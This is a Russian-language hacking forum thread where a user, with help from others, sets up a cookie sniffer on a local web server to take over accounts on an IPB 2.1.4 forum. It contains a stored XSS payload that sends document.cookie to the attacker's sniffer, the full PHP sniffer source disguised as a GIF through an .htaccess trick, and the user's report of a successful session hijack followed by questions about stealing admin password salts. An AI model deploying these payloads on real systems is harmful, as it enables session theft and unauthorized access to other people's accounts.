Собстевнно как правильно настроить сниф на денвере локально...

Хочу вытащить куки с ipb 2.1.4 метод понял как а вот

сниф как правильно настроить хз :)

Спрашивается а зачем тебе локально то :)

Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....

Вот вопрочец ещо по xss через функции жалоба

<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie;</script>

Почему собственно сниф в .php я так понимаю что в
версии 2.1.4 нет фильтрации на даный метод и даже не обязательно шифроваться под gif ?!

А чё то так и не понял, что ты хочешь!!! в чём у тебя проблема ты не можешь всунуть скрипт в форум, или у тебя проблемы со скриптом, который получит кукки!??

ДА нет хочу сниф настроить локально у себя на вебсерваке так как сетка закрытая...

Вобщем как правильно его натроить чтоб перехватывал куки

Я так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!

Собстевнно как правильно настроить сниф на денвере локально...
Хочу вытащить куки с ipb 2.1.4 метод понял как а вот
сниф как правильно настроить хз
Спрашивается а зачем тебе локально то
Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....
ты что-то путаешь - локально, это когда ты обращаешься к скрипту с той же машины на котором он работает адрес в этом случае будет: 127.0.0.1/script.php или localhost/script.php. если тебе нужно обратиться у скрипту из локальной сети, проблемы нет - делаешь это по ip под которым комп зарегестрирован в сети.

вторую часть вопроса вообще не понял, переформулируй его как-нибудь чтоли, распиши подробнее

теперь понял, дополнительной настройки тебе никакой не надо просто ставишь сервак, делаешь дотупным из сети, заливаешь сниффер, кидаешь кому надо ссылку на него, в ней адрес до твоего сервака это твой ip в локальной сети

Распишу поподробней :
Есть скрипт снифа кидаю его сюда home\custom\www
в файле .htaccess делаю настройки чтоб порт 80 светился в сетке
далее на форуме юзаю данную xss через функции (жалоба)

Правильно ?! или всеже денвер нужно донастроить чтоб он перехватывал куки...

так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!
вполне нормально. так и сделай

ничего донастраивать не надо, у тебя же куки передаются просто как параметры у скрипта

чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом

def_, угу.. просто будет типа http://yourcomp/sniffer.php?cookie=КУКИСЫ.
Отсюда видно, что достаточно настроить денвер так, чтобы он работал не только локально, а чтобы его было видно и из локалки.

Dmitry507, ты что-то странное куришь) бросай0))

def_ ок понял значь правильно мыслил :)

А вторая часть вопроса...
лазил по форуму нашел под версию ipb 2.1.4 эту xss
<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie;</script>

вот немогу понять обычно сниф сам скрипт замаскирован под gif
а вданной xss получается можно даже его изменить на php и тоже полетат куки ?!

Короче чувак. Денвер никак донастраивать не надо

чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом :)))

Если ты на щет поставить себе етот форум и опробовать все ето :) то както непрет хотя c етого и надо было начинать...

_Great_ ну это я понял уже что ненадо ок буду пробовать всем спасибо что не заставили долго ждать с ответами :))))

Хмм всеже не догоняю кое что :)
вот есть сниф состоит он из трех файлов
.htaccess
image.gif -картинка
snif.gif - сам скрип снифа
------------------------------------------
содержание файла .htaccess : и зачем он нужен
AddType application/x-httpd-php snif.gif

содержание файла snif.gif
<? // nerezus, 2005, GPL v2 // IF U WANNA USE .png(or .gif, .jpeg) EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?>

А в этом скрипте script>http:/сниффер/сниффер.php?"+location.host+document.cookie;</script> скрип ссылается на сниф с расширением .php

Если я переименую gif на .php буду ли приходить куки
или можно сослаться на gif в данном xss под этот форум ?!

Поставил я значь себе этот форум ipb 2.1.4
Кидаю скрип в жалобы
<script>img = new Image(); img.src = "http:/мой_веб/сниффер.php?"+location.host+document.cookie;</script>
Куки пришли :)

Но почему потом при замене кукисов в опере для обычного юзера нечего не происходит как был юзером так и остается некакой админки и духу нет ?!

А нет вру все проходит на ура :)

Но как до админки добраться если Админцентр потом требует повторного ввода пароля ?!

Почитал тут форум :) оказывается не так все просто мало иметь хеш админа ещо нужна
соль :)

Тогда назревает вопрос :) какие есть sql иньекции для ipb 2.1.4 чтобы пробить соль

вот нарыл иньекцию

SELECT converge_pass_salt FROM ibf_members_converge WHERE converge_id=тут_user_id

А как ее заюзать где ее вставлять тут я профан :)

это не инъекция, это просто оператор выборки из MySQL, выбирается соль юзера с таким-то ид из таблицы ibf_members_converge. Чтобы это выполнить тебе нужено иметь доступ к базе данных форума.

def_ спасиб пролил свет !!!